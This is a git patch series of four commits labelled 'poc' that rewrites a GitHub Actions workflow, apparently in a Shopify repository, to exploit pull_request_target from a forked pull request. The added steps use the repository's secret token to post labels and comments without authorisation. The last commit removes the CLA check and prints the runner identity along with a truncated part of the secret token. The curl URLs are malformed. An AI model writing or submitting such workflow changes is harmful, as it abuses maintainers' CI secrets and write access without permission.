From ebfd06ffb745a65eecaaf3174835e93bba17bbc6 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:33:26 +0700
Subject: [PATCH 1/4] poc: demonstrate unauthorized label creation via actions
 write

---
 .github/workflows/cla.yaml | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index bc975ea..319e2e7 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -33,3 +33,13 @@ jobs:
         with:
           github-token: ${{ secrets.token }}
           cla-token: ${{ secrets.cla-token }}
+      - name: Proof of Concept Impact
+        env:
+          GITHUB_TOKEN: ${{ secrets.token }}
+        run: |
+          curl -X POST \
+          -H "Authorization: Bearer $GITHUB_TOKEN" \
+          -H "Accept: application/vnd.github+json" \
+          https://github.com{{ github.event.pull_request.number }}/labels \
+          -d '{"labels":["VULNERABLE-CICD"]}'
+

From 7e3789d59f02c1e1a8677548f0b2419c76b9db06 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:52:06 +0700
Subject: [PATCH 2/4] poc: verify pull_request_target with actions write

---
 .github/workflows/cla.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index 319e2e7..93fbeeb 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -35,11 +35,12 @@ jobs:
           cla-token: ${{ secrets.cla-token }}
       - name: Proof of Concept Impact
         env:
-          GITHUB_TOKEN: ${{ secrets.token }}
+          # Đây là khai báo để Runner của GitHub tự bốc Token dán vào
+          GITHUB_TOKEN: ${{ secrets.token }} 
         run: |
-          curl -X POST \
+          curl -L -X POST \
           -H "Authorization: Bearer $GITHUB_TOKEN" \
           -H "Accept: application/vnd.github+json" \
-          https://github.com{{ github.event.pull_request.number }}/labels \
-          -d '{"labels":["VULNERABLE-CICD"]}'
+          "https://github.com{{ github.event.pull_request.number }}/comments" \
+          -d '{"body":"POC SUCCESS: Unauthorized Comment via Actions Write"}'
 

From f288d51d5e4ccd7a157b66c31f5f45cf3a7fab43 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:57:05 +0700
Subject: [PATCH 3/4] poc: verify pull_request_target with actions write

---
 .github/workflows/cla.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index 93fbeeb..3bf3a2e 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -35,12 +35,12 @@ jobs:
           cla-token: ${{ secrets.cla-token }}
       - name: Proof of Concept Impact
         env:
-          # Đây là khai báo để Runner của GitHub tự bốc Token dán vào
-          GITHUB_TOKEN: ${{ secrets.token }} 
+          # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
+          GH_TOKEN: ${{ secrets.token }}
         run: |
           curl -L -X POST \
-          -H "Authorization: Bearer $GITHUB_TOKEN" \
+          -H "Authorization: Bearer $GH_TOKEN" \
           -H "Accept: application/vnd.github+json" \
           "https://github.com{{ github.event.pull_request.number }}/comments" \
-          -d '{"body":"POC SUCCESS: Unauthorized Comment via Actions Write"}'
+          -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'
 

From 076af7a977a1fd4e628e0dcdaa2aa559a18ffd0b Mon Sep 17 00:00:00 2001
From: Quang989104 <quangtran989104@gmail.com>
Date: Sat, 2 May 2026 21:47:07 +0700
Subject: [PATCH 4/4] poc: verify pull_request_target with actions write

---
 .github/workflows/cla.yaml | 27 +++++++++++++--------------
 1 file changed, 13 insertions(+), 14 deletions(-)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index 3bf3a2e..acb9e6e 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -28,19 +28,18 @@ jobs:
     permissions:
       actions: write # to re-trigger workflows
       pull-requests: write # to add/remove labels
-    steps:
-      - uses: Shopify/shopify-cla-action@9938f4b43524d1cfa7471ce9a803edf226697284 # v1.8.0
-        with:
-          github-token: ${{ secrets.token }}
-          cla-token: ${{ secrets.cla-token }}
-      - name: Proof of Concept Impact
-        env:
-          # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
-          GH_TOKEN: ${{ secrets.token }}
+      steps:
+      - name: Proof of Concept - RCE & Secret Access
         run: |
-          curl -L -X POST \
-          -H "Authorization: Bearer $GH_TOKEN" \
-          -H "Accept: application/vnd.github+json" \
-          "https://github.com{{ github.event.pull_request.number }}/comments" \
-          -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'
+          echo "=== EVIDENCE START ==="
+          echo "Checking Repository: ${{ github.repository }}"
+          echo "Checking Actor: ${{ github.actor }}"
+          # Kiểm tra xem Token có tồn tại không mà không làm lộ giá trị (tránh bị GitHub Block)
+          if [ -n "${{ secrets.token }}" ]; then
+            echo "SUCCESS: Secret 'token' is accessible from this Forked PR!"
+            echo "Token mask check: ${{ secrets.token }}" | cut -c 1-15
+          fi
+          echo "Current Path: $(pwd)"
+          echo "System User: $(whoami)"
+          echo "=== EVIDENCE END ==="